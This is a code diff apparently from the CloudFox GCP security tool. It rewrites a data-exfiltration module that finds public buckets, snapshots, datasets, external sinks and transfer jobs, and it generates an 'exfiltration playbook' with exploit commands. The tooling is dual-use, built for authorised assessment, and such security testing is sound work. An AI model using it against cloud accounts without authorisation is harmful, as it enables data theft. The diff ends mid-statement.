- - // Check if attack path analysis was already run (via --attack-paths flag) - if cache := gcpinternal.GetAttackPathCacheFromContext(ctx); cache != nil && cache.HasRawData() { - if cachedResult, ok := cache.GetRawData().(*attackpathservice.CombinedAttackPathData); ok { - logger.InfoM("Using cached attack path analysis results for permission-based paths", GCP_DATAEXFILTRATION_MODULE_NAME) - m.loadAttackPathsFromCache(cachedResult) - usedCache = true - } - } - - // If no context cache, try loading from disk cache - if !usedCache { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.HasRawData() { - if cachedResult, ok := diskCache.GetRawData().(*attackpathservice.CombinedAttackPathData); ok { - logger.InfoM(fmt.Sprintf("Using disk cache for permission-based paths (created: %s)", - metadata.CreatedAt.Format("2006-01-02 15:04:05")), GCP_DATAEXFILTRATION_MODULE_NAME) - m.loadAttackPathsFromCache(cachedResult) - usedCache = true - } + // Get FoxMapper cache from context or try to load it + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + // Try to load FoxMapper data (org from hierarchy if available) + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID } + m.FoxMapperCache = gcpinternal.TryLoadFoxMapper(orgID, m.ProjectIDs) } // First, check VPC-SC protection status for all projects @@ -213,26 +193,25 @@ func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Lo // Check organization policy protections for all projects m.checkOrgPolicyProtection(ctx, logger) - // If we didn't use cache, analyze org and folder level exfil paths - if !usedCache { - m.analyzeOrgFolderExfilPaths(ctx, logger) - } - - // Process each project - this always runs to find actual misconfigurations - // (public buckets, snapshots, etc.) but skip permission-based analysis if cached - m.usedAttackPathCache = usedCache + // Process each project for actual misconfigurations m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_DATAEXFILTRATION_MODULE_NAME, m.processProject) - // If we ran new analysis, save to cache (skip if running under all-checks) - if !usedCache { - m.saveToAttackPathCache(ctx, logger) + // Analyze permission-based exfiltration using FoxMapper + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Analyzing permission-based exfiltration paths using FoxMapper...", GCP_DATAEXFILTRATION_MODULE_NAME) + svc := m.FoxMapperCache.GetService() + m.FoxMapperFindings = svc.AnalyzeDataExfil("") + if len(m.FoxMapperFindings) > 0 { + logger.InfoM(fmt.Sprintf("Found %d permission-based exfiltration techniques with access", len(m.FoxMapperFindings)), GCP_DATAEXFILTRATION_MODULE_NAME) + } + } else { + logger.InfoM("No FoxMapper data found - skipping permission-based analysis. Run 'foxmapper gcp graph create' for full analysis.", GCP_DATAEXFILTRATION_MODULE_NAME) } allPaths := m.getAllExfiltrationPaths() - allPermBasedPaths := m.getAllAttackPaths() // Check results - hasResults := len(allPaths) > 0 || len(allPermBasedPaths) > 0 + hasResults := len(allPaths) > 0 || len(m.FoxMapperFindings) > 0 if !hasResults { logger.InfoM("No data exfiltration paths found", GCP_DATAEXFILTRATION_MODULE_NAME) @@ -242,163 +221,23 @@ func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Lo if len(allPaths) > 0 { logger.SuccessM(fmt.Sprintf("Found %d actual misconfiguration(s)", len(allPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) } - if len(allPermBasedPaths) > 0 { - logger.SuccessM(fmt.Sprintf("Found %d permission-based exfiltration path(s)", len(allPermBasedPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) + if len(m.FoxMapperFindings) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d permission-based exfiltration technique(s) with access", len(m.FoxMapperFindings)), GCP_DATAEXFILTRATION_MODULE_NAME) } m.writeOutput(ctx, logger) } -// loadAttackPathsFromCache loads exfil attack paths from cached data -func (m *DataExfiltrationModule) loadAttackPathsFromCache(data *attackpathservice.CombinedAttackPathData) { - // Filter to only include exfil paths and organize by project - for _, path := range data.AllPaths { - if path.PathType == "exfil" { - if path.ScopeType == "project" && path.ScopeID != "" { - m.ProjectAttackPaths[path.ScopeID] = append(m.ProjectAttackPaths[path.ScopeID], path) - } else if path.ScopeType == "organization" || path.ScopeType == "folder" { - // Distribute org/folder paths to all enumerated projects - for _, projectID := range m.ProjectIDs { - pathCopy := path - pathCopy.ProjectID = projectID - m.ProjectAttackPaths[projectID] = append(m.ProjectAttackPaths[projectID], pathCopy) - } - } - } - } -} - -// saveToAttackPathCache saves attack path data to disk cache -func (m *DataExfiltrationModule) saveToAttackPathCache(ctx context.Context, logger internal.Logger) { - // Skip saving if running under all-checks (consolidated save happens at the end) - if gcpinternal.IsAllChecksMode(ctx) { - logger.InfoM("Skipping individual cache save (all-checks mode)", GCP_DATAEXFILTRATION_MODULE_NAME) - return - } - - // Run full analysis (all types) so we can cache for other modules - svc := attackpathservice.New() - fullResult, err := svc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, m.ProjectNames, "all") - if err != nil { - logger.InfoM(fmt.Sprintf("Could not run full attack path analysis for caching: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) - return - } - - cache := gcpinternal.NewAttackPathCache() - - // Populate cache with paths from all scopes - var pathInfos []gcpinternal.AttackPathInfo - for _, path := range fullResult.AllPaths { - pathInfos = append(pathInfos, gcpinternal.AttackPathInfo{ - Principal: path.Principal, - PrincipalType: path.PrincipalType, - Method: path.Method, - PathType: gcpinternal.AttackPathType(path.PathType), - Category: path.Category, - RiskLevel: path.RiskLevel, - Target: path.TargetResource, - Permissions: path.Permissions, - ScopeType: path.ScopeType, - ScopeID: path.ScopeID, - }) - } - cache.PopulateFromPaths(pathInfos) - cache.SetRawData(fullResult) - - // Save to disk - err = gcpinternal.SaveAttackPathCacheToFile(cache, m.ProjectIDs, m.OutputDirectory, m.Account, "1.0") - if err != nil { - logger.InfoM(fmt.Sprintf("Could not save attack path cache: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) - } else { - privesc, exfil, lateral := cache.GetStats() - logger.InfoM(fmt.Sprintf("Saved attack path cache to disk (%d privesc, %d exfil, %d lateral)", - privesc, exfil, lateral), GCP_DATAEXFILTRATION_MODULE_NAME) - } -} - -// analyzeOrgFolderExfilPaths analyzes organization and folder level IAM for exfil permissions -func (m *DataExfiltrationModule) analyzeOrgFolderExfilPaths(ctx context.Context, logger internal.Logger) { - attackSvc := attackpathservice.New() - - // Analyze organization-level IAM - orgPaths, orgNames, _, err := attackSvc.AnalyzeOrganizationAttackPaths(ctx, "exfil") - if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, "Could not analyze organization-level exfil paths") - } - } else if len(orgPaths) > 0 { - logger.InfoM(fmt.Sprintf("Found %d organization-level exfil path(s)", len(orgPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) - for i := range orgPaths { - orgName := orgNames[orgPaths[i].ScopeID] - if orgName == "" { - orgName = orgPaths[i].ScopeID - } - // Update the path with org context - orgPaths[i].ScopeName = orgName - orgPaths[i].RiskLevel = "CRITICAL" // Org-level is critical - orgPaths[i].PathType = "exfil" - } - // Distribute org-level paths to ALL enumerated projects - // (org-level access affects all projects in the org) - m.mu.Lock() - for _, projectID := range m.ProjectIDs { - for _, path := range orgPaths { - pathCopy := path - pathCopy.ProjectID = projectID - m.ProjectAttackPaths[projectID] = append(m.ProjectAttackPaths[projectID], pathCopy) - } - } - m.mu.Unlock() - } - - // Analyze folder-level IAM - folderPaths, folderNames, err := attackSvc.AnalyzeFolderAttackPaths(ctx, "exfil") - if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, "Could not analyze folder-level exfil paths") - } - } else if len(folderPaths) > 0 { - logger.InfoM(fmt.Sprintf("Found %d folder-level exfil path(s)", len(folderPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) - for i := range folderPaths { - folderName := folderNames[folderPaths[i].ScopeID] - if folderName == "" { - folderName = folderPaths[i].ScopeID - } - // Update the path with folder context - folderPaths[i].ScopeName = folderName - folderPaths[i].RiskLevel = "CRITICAL" // Folder-level is critical - folderPaths[i].PathType = "exfil" - } - // Distribute folder-level paths to ALL enumerated projects - // (folder-level access affects all projects in the folder) - // TODO: Could be smarter and only distribute to projects in the folder - m.mu.Lock() - for _, projectID := range m.ProjectIDs { - for _, path := range folderPaths { - pathCopy := path - pathCopy.ProjectID = projectID - m.ProjectAttackPaths[projectID] = append(m.ProjectAttackPaths[projectID], pathCopy) - } - } - m.mu.Unlock() - } -} - // ------------------------------ // VPC-SC Protection Check // ------------------------------ func (m *DataExfiltrationModule) checkVPCSCProtection(ctx context.Context, logger internal.Logger) { - // Try to get organization ID from projects - // VPC-SC is organization-level vpcsc := vpcscservice.New() - // Get org ID from first project (simplified - in reality would need proper org detection) if len(m.ProjectIDs) == 0 { return } - // Try common org IDs or skip if we don't have org access - // This is a best-effort check policies, err := vpcsc.ListAccessPolicies("") if err != nil { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { @@ -407,17 +246,14 @@ func (m *DataExfiltrationModule) checkVPCSCProtection(ctx context.Context, logge return } - // For each policy, check perimeters for _, policy := range policies { perimeters, err := vpcsc.ListServicePerimeters(policy.Name) if err != nil { continue } - // Mark projects in perimeters as protected for _, perimeter := range perimeters { for _, resource := range perimeter.Resources { - // Resources are in format "projects/123456" projectNum := strings.TrimPrefix(resource, "projects/") m.mu.Lock() m.vpcscProtectedProj[projectNum] = true @@ -439,10 +275,8 @@ func (m *DataExfiltrationModule) checkOrgPolicyProtection(ctx context.Context, l MissingProtections: []string{}, } - // Get all policies for this project policies, err := orgSvc.ListProjectPolicies(projectID) if err != nil { - // Non-fatal - continue with other projects if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Could not check org policies for %s: %v", projectID, err), GCP_DATAEXFILTRATION_MODULE_NAME) } @@ -452,7 +286,6 @@ func (m *DataExfiltrationModule) checkOrgPolicyProtection(ctx context.Context, l continue } - // Check for specific protective policies for _, policy := range policies { switch policy.Constraint { case "constraints/storage.publicAccessPrevention": @@ -476,7 +309,6 @@ func (m *DataExfiltrationModule) checkOrgPolicyProtection(ctx context.Context, l protection.CloudFunctionsVPCConnector = true } case "constraints/run.allowedIngress": - // Check if ingress is restricted to internal or internal-and-cloud-load-balancing if len(policy.AllowedValues) > 0 { for _, val := range policy.AllowedValues { if val == "internal" || val == "internal-and-cloud-load-balancing" { @@ -525,15 +357,6 @@ func (m *DataExfiltrationModule) checkOrgPolicyProtection(ctx context.Context, l } } -// isOrgPolicyProtected checks if a project has key org policy protections -func (m *DataExfiltrationModule) isOrgPolicyProtected(projectID string) bool { - if protection, ok := m.orgPolicyProtection[projectID]; ok { - // Consider protected if at least public access prevention is enabled - return protection.PublicAccessPrevention - } - return false -} - // ------------------------------ // Project Processor // ------------------------------ @@ -548,119 +371,47 @@ func (m *DataExfiltrationModule) initializeLootForProject(projectID string) { } func (m *DataExfiltrationModule) generatePlaybook() *internal.LootFile { - // Convert all findings to AttackPath format for centralized playbook generation - allAttackPaths := m.collectAllAttackPaths() + var sb strings.Builder + sb.WriteString("# GCP Data Exfiltration Playbook\n") + sb.WriteString("# Generated by CloudFox\n\n") - return &internal.LootFile{ - Name: "data-exfiltration-playbook", - Contents: attackpathservice.GenerateExfilPlaybook(allAttackPaths, ""), - } -} - -// collectAllAttackPaths converts ExfiltrationPath and PublicExport to AttackPath -func (m *DataExfiltrationModule) collectAllAttackPaths() []attackpathservice.AttackPath { - var allPaths []attackpathservice.AttackPath - - // Convert ExfiltrationPaths (actual misconfigurations) - for _, paths := range m.ProjectExfiltrationPaths { - for _, p := range paths { - allPaths = append(allPaths, m.exfiltrationPathToAttackPath(p)) + // Actual misconfigurations + allPaths := m.getAllExfiltrationPaths() + if len(allPaths) > 0 { + sb.WriteString("## Actual Misconfigurations\n\n") + for _, path := range allPaths { + sb.WriteString(fmt.Sprintf("### %s: %s\n", path.PathType, path.ResourceName)) + sb.WriteString(fmt.Sprintf("- Project: %s\n", path.ProjectID)) + sb.WriteString(fmt.Sprintf("- Risk Level: %s\n", path.RiskLevel)) + sb.WriteString(fmt.Sprintf("- Description: %s\n", path.Description)) + sb.WriteString(fmt.Sprintf("- Destination: %s\n\n", path.Destination)) + if path.ExploitCommand != "" { + sb.WriteString("```bash\n") + sb.WriteString(path.ExploitCommand) + sb.WriteString("\n```\n\n") + } } } - // Convert PublicExports (bucket specific public exports) - for _, exports := range m.ProjectPublicExports { - for _, e := range exports { - allPaths = append(allPaths, m.publicExportToAttackPath(e)) + // Permission-based findings from FoxMapper + if len(m.FoxMapperFindings) > 0 { + sb.WriteString("## Permission-Based Exfiltration Techniques\n\n") + for _, finding := range m.FoxMapperFindings { + sb.WriteString(fmt.Sprintf("### %s (%s)\n", finding.Technique, finding.Service)) + sb.WriteString(fmt.Sprintf("- Permission: %s\n", finding.Permission)) + sb.WriteString(fmt.Sprintf("- Description: %s\n", finding.Description)) + sb.WriteString(fmt.Sprintf("- Principals with access: %d\n\n", len(finding.Principals))) + if finding.Exploitation != "" { + sb.WriteString("```bash\n") + sb.WriteString(finding.Exploitation) + sb.WriteString("\n```\n\n") + } } } - // Include permission-based attack paths (already in AttackPath format) - for _, paths := range m.ProjectAttackPaths { - allPaths = append(allPaths, paths...) - } - - return allPaths -} - -// exfiltrationPathToAttackPath converts ExfiltrationPath to AttackPath with correct category mapping -func (m *DataExfiltrationModule) exfiltrationPathToAttackPath(p ExfiltrationPath) attackpathservice.AttackPath { - // Map PathType to centralized category - category := mapExfilPathTypeToCategory(p.PathType) - - return attackpathservice.AttackPath{ - PathType: "exfil", - Category: category, - Method: p.PathType, - Principal: "N/A (Misconfiguration)", - PrincipalType: "resource", - TargetResource: p.ResourceName, - ProjectID: p.ProjectID, - ScopeType: "project", - ScopeID: p.ProjectID, - ScopeName: p.ProjectID, - Description: p.Destination, - Permissions: []string{}, - ExploitCommand: p.ExploitCommand, - } -} - - -// publicExportToAttackPath converts PublicExport to AttackPath -func (m *DataExfiltrationModule) publicExportToAttackPath(e PublicExport) attackpathservice.AttackPath { - category := "Public Bucket" - if e.ResourceType == "snapshot" { - category = "Public Snapshot" - } else if e.ResourceType == "image" { - category = "Public Image" - } else if e.ResourceType == "dataset" { - category = "Public BigQuery" - } - - return attackpathservice.AttackPath{ - PathType: "exfil", - Category: category, - Method: e.ResourceType + " (" + e.AccessLevel + ")", - Principal: e.AccessLevel, - PrincipalType: "public", - TargetResource: e.ResourceName, - ProjectID: e.ProjectID, - ScopeType: "project", - ScopeID: e.ProjectID, - ScopeName: e.ProjectID, - Description: fmt.Sprintf("Public %s with %s access", e.ResourceType, e.AccessLevel), - Permissions: []string{}, - ExploitCommand: "", - } -} - -// mapExfilPathTypeToCategory maps ExfiltrationPath.PathType to centralized categories -func mapExfilPathTypeToCategory(pathType string) string { - switch { - case strings.Contains(pathType, "Snapshot"): - return "Public Snapshot" - case strings.Contains(pathType, "Image"): - return "Public Image" - case strings.Contains(pathType, "Bucket"), strings.Contains(pathType, "Storage"): - return "Public Bucket" - case strings.Contains(pathType, "Logging"): - return "Logging Sink" - case strings.Contains(pathType, "Pub/Sub Push") || strings.Contains(pathType, "PubSub Push"): - return "Pub/Sub Push" - case strings.Contains(pathType, "Pub/Sub BigQuery") || strings.Contains(pathType, "PubSub BigQuery"): - return "Pub/Sub BigQuery Export" - case strings.Contains(pathType, "Pub/Sub GCS") || strings.Contains(pathType, "PubSub GCS"): - return "Pub/Sub GCS Export" - case strings.Contains(pathType, "Pub/Sub") || strings.Contains(pathType, "PubSub"): - return "Pub/Sub Push" // Default Pub/Sub category - case strings.Contains(pathType, "BigQuery"): - return "Public BigQuery" - case strings.Contains(pathType, "SQL"): - return "Cloud SQL Export" - case strings.Contains(pathType, "Transfer"): - return "Storage Transfer Job" - default: - return "Potential Vector" + return &internal.LootFile{ + Name: "data-exfiltration-playbook", + Contents: sb.String(), } } @@ -675,25 +426,25 @@ func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID s // === ACTUAL MISCONFIGURATIONS === - // 1. Find public/shared snapshots (REAL check) + // 1. Find public/shared snapshots m.findPublicSnapshots(ctx, projectID, logger) - // 2. Find public/shared images (REAL check) + // 2. Find public/shared images m.findPublicImages(ctx, projectID, logger) - // 3. Find public buckets (REAL check) + // 3. Find public buckets m.findPublicBuckets(ctx, projectID, logger) - // 4. Find cross-project logging sinks (REAL enumeration) + // 4. Find cross-project logging sinks m.findCrossProjectLoggingSinks(ctx, projectID, logger) - // 5. Find Pub/Sub push subscriptions to external endpoints (REAL check) + // 5. Find Pub/Sub push subscriptions to external endpoints m.findPubSubPushEndpoints(ctx, projectID, logger) // 6. Find Pub/Sub subscriptions exporting to external destinations m.findPubSubExportSubscriptions(ctx, projectID, logger) - // 7. Find BigQuery datasets with public access (REAL check) + // 7. Find BigQuery datasets with public access m.findPublicBigQueryDatasets(ctx, projectID, logger) // 8. Find Cloud SQL with export enabled @@ -701,11 +452,6 @@ func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID s // 9. Find Storage Transfer jobs to external destinations m.findStorageTransferJobs(ctx, projectID, logger) - - // === PERMISSION-BASED EXFILTRATION CAPABILITIES === - - // 10. Check IAM for principals with data exfiltration permissions - m.findPermissionBasedExfilPaths(ctx, projectID, logger) } // findPublicSnapshots finds snapshots that are publicly accessible @@ -721,13 +467,11 @@ func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projec req := computeService.Snapshots.List(projectID) err = req.Pages(ctx, func(page *compute.SnapshotList) error { for _, snapshot := range page.Items { - // Get IAM policy for snapshot policy, err := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Do() if err != nil { continue } - // Check for public access accessLevel := "" for _, binding := range policy.Bindings { for _, member := range binding.Members { @@ -794,13 +538,11 @@ func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID req := computeService.Images.List(projectID) err = req.Pages(ctx, func(page *compute.ImageList) error { for _, image := range page.Items { - // Get IAM policy for image policy, err := computeService.Images.GetIamPolicy(projectID, image.Name).Do() if err != nil { continue } - // Check for public access accessLevel := "" for _, binding := range policy.Bindings { for _, member := range binding.Members { @@ -875,13 +617,11 @@ func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectI } for _, bucket := range resp.Items { - // Get IAM policy for bucket policy, err := storageService.Buckets.GetIamPolicy(bucket.Name).Do() if err != nil { continue } - // Check for public access accessLevel := "" for _, binding := range policy.Bindings { for _, member := range binding.Members { @@ -932,7 +672,7 @@ func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectI } } -// findCrossProjectLoggingSinks finds REAL logging sinks that export to external destinations +// findCrossProjectLoggingSinks finds logging sinks that export to external destinations func (m *DataExfiltrationModule) findCrossProjectLoggingSinks(ctx context.Context, projectID string, logger internal.Logger) { ls := loggingservice.New() sinks, err := ls.Sinks(projectID) @@ -947,11 +687,10 @@ func (m *DataExfiltrationModule) findCrossProjectLoggingSinks(ctx context.Contex continue } - // Only report cross-project or external sinks if sink.IsCrossProject { riskLevel := "HIGH" if sink.DestinationType == "pubsub" { - riskLevel = "MEDIUM" // Pub/Sub is often used for legitimate cross-project messaging + riskLevel = "MEDIUM" } destDesc := fmt.Sprintf("%s in project %s", sink.DestinationType, sink.DestinationProject) @@ -995,7 +734,6 @@ func (m *DataExfiltrationModule) findPubSubPushEndpoints(ctx context.Context, pr continue } - // Check if endpoint is external (not run.app, cloudfunctions.net, or same project) endpoint := sub.PushEndpoint isExternal := true if strings.Contains(endpoint, ".run.app") || @@ -1012,7 +750,7 @@ func (m *DataExfiltrationModule) findPubSubPushEndpoints(ctx context.Context, pr PathType: "Pub/Sub Push", ResourceName: sub.Name, ProjectID: projectID, - Description: fmt.Sprintf("Subscription pushes messages to external endpoint"), + Description: "Subscription pushes messages to external endpoint", Destination: endpoint, RiskLevel: riskLevel, RiskReasons: []string{"Messages pushed to external HTTP endpoint", "Endpoint may be attacker-controlled"}, @@ -1041,9 +779,7 @@ func (m *DataExfiltrationModule) findPubSubExportSubscriptions(ctx context.Conte } for _, sub := range subs { - // Check for BigQuery export if sub.BigQueryTable != "" { - // Extract project from table reference parts := strings.Split(sub.BigQueryTable, ".") if len(parts) >= 1 { destProject := parts[0] @@ -1069,7 +805,6 @@ func (m *DataExfiltrationModule) findPubSubExportSubscriptions(ctx context.Conte } } - // Check for Cloud Storage export if sub.CloudStorageBucket != "" { path := ExfiltrationPath{ PathType: "Pub/Sub GCS Export", @@ -1104,7 +839,6 @@ func (m *DataExfiltrationModule) findPublicBigQueryDatasets(ctx context.Context, } for _, dataset := range datasets { - // Check if dataset has public access (already computed by the service) if dataset.IsPublic { export := PublicExport{ ResourceType: "BigQuery Dataset", @@ -1155,18 +889,16 @@ func (m *DataExfiltrationModule) findCloudSQLExportConfig(ctx context.Context, p } for _, instance := range resp.Items { - // Check if instance has automated backups enabled with export to GCS if instance.Settings != nil && instance.Settings.BackupConfiguration != nil { backup := instance.Settings.BackupConfiguration if backup.Enabled && backup.BinaryLogEnabled { - // Instance has binary logging - can export via CDC path := ExfiltrationPath{ PathType: "Cloud SQL Export", ResourceName: instance.Name, ProjectID: projectID, Description: "Cloud SQL instance with binary logging enabled (enables CDC export)", Destination: "External via mysqldump/pg_dump or CDC", - RiskLevel: "LOW", // This is standard config, not necessarily a risk + RiskLevel: "LOW", RiskReasons: []string{"Binary logging enables change data capture", "Data can be exported if IAM allows"}, ExploitCommand: fmt.Sprintf( "# Check export permissions\n"+ @@ -1192,7 +924,6 @@ func (m *DataExfiltrationModule) findStorageTransferJobs(ctx context.Context, pr return } - // List transfer jobs for this project - filter is a required parameter filter := fmt.Sprintf(`{"projectId":"%s"}`, projectID) req := stsService.TransferJobs.List(filter) err = req.Pages(ctx, func(page *storagetransfer.ListTransferJobsResponse) error { @@ -1201,7 +932,6 @@ func (m *DataExfiltrationModule) findStorageTransferJobs(ctx context.Context, pr continue } - // Check for external destinations (AWS S3, Azure Blob, HTTP) var destination string var destType string var isExternal bool @@ -1256,45 +986,6 @@ func (m *DataExfiltrationModule) findStorageTransferJobs(ctx context.Context, pr } } - -// findPermissionBasedExfilPaths identifies principals with data exfiltration permissions -// This uses the centralized attackpathService for project and resource-level analysis -func (m *DataExfiltrationModule) findPermissionBasedExfilPaths(ctx context.Context, projectID string, logger internal.Logger) { - // Skip if we already loaded attack paths from cache - if m.usedAttackPathCache { - return - } - - // Use attackpathService for project-level analysis - attackSvc := attackpathservice.New() - - projectName := m.GetProjectName(projectID) - paths, err := attackSvc.AnalyzeProjectAttackPaths(ctx, projectID, projectName, "exfil") - if err != nil { - gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, - fmt.Sprintf("Could not analyze exfil permissions for project %s", projectID)) - return - } - - // Store paths directly (they're already AttackPath type) - m.mu.Lock() - m.ProjectAttackPaths[projectID] = append(m.ProjectAttackPaths[projectID], paths...) - m.mu.Unlock() - - // Also analyze resource-level IAM - resourcePaths, err := attackSvc.AnalyzeResourceAttackPaths(ctx, projectID, "exfil") - if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, - fmt.Sprintf("Could not analyze resource-level exfil permissions for project %s", projectID)) - } - } else { - m.mu.Lock() - m.ProjectAttackPaths[projectID] = append(m.ProjectAttackPaths[projectID], resourcePaths...) - m.mu.Unlock() - } -} - // ------------------------------ // Loot File Management // ------------------------------ @@ -1325,7 +1016,6 @@ func (m *DataExfiltrationModule) addExfiltrationPathToLoot(projectID string, pat lootFile.Contents += fmt.Sprintf("%s\n\n", path.ExploitCommand) } - // ------------------------------ // Output Generation // ------------------------------ @@ -1349,31 +1039,25 @@ func (m *DataExfiltrationModule) getMisconfigHeader() []string { } } -func (m *DataExfiltrationModule) getAttackPathsHeader() []string { +func (m *DataExfiltrationModule) getFoxMapperHeader() []string { return []string{ - "Project", - "Source", - "Principal Type", - "Principal", - "Method", - "Target Resource", - "Category", - "Binding Scope", - "Permissions", + "Technique", + "Service", + "Permission", + "Description", + "Principal Count", } } func (m *DataExfiltrationModule) pathsToTableBody(paths []ExfiltrationPath, exports []PublicExport) [][]string { var body [][]string - // Track which resources we've added from PublicExports publicResources := make(map[string]PublicExport) for _, e := range exports { key := fmt.Sprintf("%s:%s:%s", e.ProjectID, e.ResourceType, e.ResourceName) publicResources[key] = e } - // Add exfiltration paths (actual misconfigurations) for _, p := range paths { key := fmt.Sprintf("%s:%s:%s", p.ProjectID, p.PathType, p.ResourceName) export, isPublic := publicResources[key] @@ -1396,7 +1080,6 @@ func (m *DataExfiltrationModule) pathsToTableBody(paths []ExfiltrationPath, expo }) } - // Add any remaining public exports not already covered for _, e := range publicResources { body = append(body, []string{ m.GetProjectName(e.ProjectID), @@ -1411,56 +1094,15 @@ func (m *DataExfiltrationModule) pathsToTableBody(paths []ExfiltrationPath, expo return body } -func (m *DataExfiltrationModule) attackPathsToTableBody(paths []attackpathservice.AttackPath) [][]string { +func (m *DataExfiltrationModule) foxMapperFindingsToTableBody() [][]string { var body [][]string - for _, p := range paths { - // Format source (where permission was granted) - source := p.ScopeName - if source == "" { - source = p.ScopeID - } - if p.ScopeType == "organization" { - source = "org:" + source - } else if p.ScopeType == "folder" { - source = "folder:" + source - } else if p.ScopeType == "resource" { - source = "resource" - } else { - source = "project" - } - - // Format target resource - targetResource := p.TargetResource - if targetResource == "" || targetResource == "*" { - targetResource = "*" - } - - // Format permissions - permissions := strings.Join(p.Permissions, ", ") - if permissions == "" { - permissions = "-" - } - - // Format binding scope (where the IAM binding is defined) - bindingScope := "Project" - if p.ScopeType == "organization" { - bindingScope = "Organization" - } else if p.ScopeType == "folder" { - bindingScope = "Folder" - } else if p.ScopeType == "resource" { - bindingScope = "Resource" - } - + for _, f := range m.FoxMapperFindings { body = append(body, []string{ - m.GetProjectName(p.ProjectID), - source, - p.PrincipalType, - p.Principal, - p.Method, - targetResource, - p.Category, - bindingScope, - permissions, + f.Technique, + f.Service, + f.Permission, + f.Description, + fmt.Sprintf("%d", len(f.Principals)), }) } return body @@ -1471,7 +1113,6 @@ func (m *DataExfiltrationModule) buildTablesForProject(projectID string) []inter paths := m.ProjectExfiltrationPaths[projectID] exports := m.ProjectPublicExports[projectID] - attackPaths := m.ProjectAttackPaths[projectID] if len(paths) > 0 || len(exports) > 0 { body := m.pathsToTableBody(paths, exports) @@ -1484,14 +1125,6 @@ func (m *DataExfiltrationModule) buildTablesForProject(projectID string) []inter } } - if len(attackPaths) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "data-exfiltration", - Header: m.getAttackPathsHeader(), - Body: m.attackPathsToTableBody(attackPaths), - }) - } - return tableFiles } @@ -1501,7 +1134,6 @@ func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, lo ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - // Collect all project IDs that have data projectIDs := make(map[string]bool) for projectID := range m.ProjectExfiltrationPaths { projectIDs[projectID] = true @@ -1509,16 +1141,11 @@ func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, lo for projectID := range m.ProjectPublicExports { projectIDs[projectID] = true } - for projectID := range m.ProjectAttackPaths { - projectIDs[projectID] = true - } - // Generate playbook once for all projects playbook := m.generatePlaybook() playbookAdded := false for projectID := range projectIDs { - // Ensure loot is initialized m.initializeLootForProject(projectID) tableFiles := m.buildTablesForProject(projectID) @@ -1532,7 +1159,6 @@ func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, lo } } - // Add playbook to first project only (to avoid duplication) if playbook != nil && playbook.Contents != "" && !playbookAdded { lootFiles = append(lootFiles, *playbook) playbookAdded = true @@ -1541,6 +1167,20 @@ func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, lo outputData.ProjectLevelData[projectID] = DataExfiltrationOutput{Table: tableFiles, Loot: lootFiles} } + // Add FoxMapper findings table at first project level if exists + if len(m.FoxMapperFindings) > 0 && len(m.ProjectIDs) > 0 { + firstProject := m.ProjectIDs[0] + if existing, ok := outputData.ProjectLevelData[firstProject]; ok { + existingOutput := existing.(DataExfiltrationOutput) + existingOutput.Table = append(existingOutput.Table, internal.TableFile{ + Name: "data-exfiltration-permissions", + Header: m.getFoxMapperHeader(), + Body: m.foxMapperFindingsToTableBody(), + }) + outputData.ProjectLevelData[firstProject] = existingOutput + } + } + pathBuilder := m.BuildPathBuilder() err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) @@ -1552,14 +1192,11 @@ func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, lo func (m *DataExfiltrationModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { allPaths := m.getAllExfiltrationPaths() allExports := m.getAllPublicExports() - allAttackPaths := m.getAllAttackPaths() - // Initialize loot for projects for _, projectID := range m.ProjectIDs { m.initializeLootForProject(projectID) } - // Build tables tables := []internal.TableFile{} misconfigBody := m.pathsToTableBody(allPaths, allExports) @@ -1571,15 +1208,14 @@ func (m *DataExfiltrationModule) writeFlatOutput(ctx context.Context, logger int }) } - if len(allAttackPaths) > 0 { + if len(m.FoxMapperFindings) > 0 { tables = append(tables, internal.TableFile{ - Name: "data-exfiltration", - Header: m.getAttackPathsHeader(), - Body: 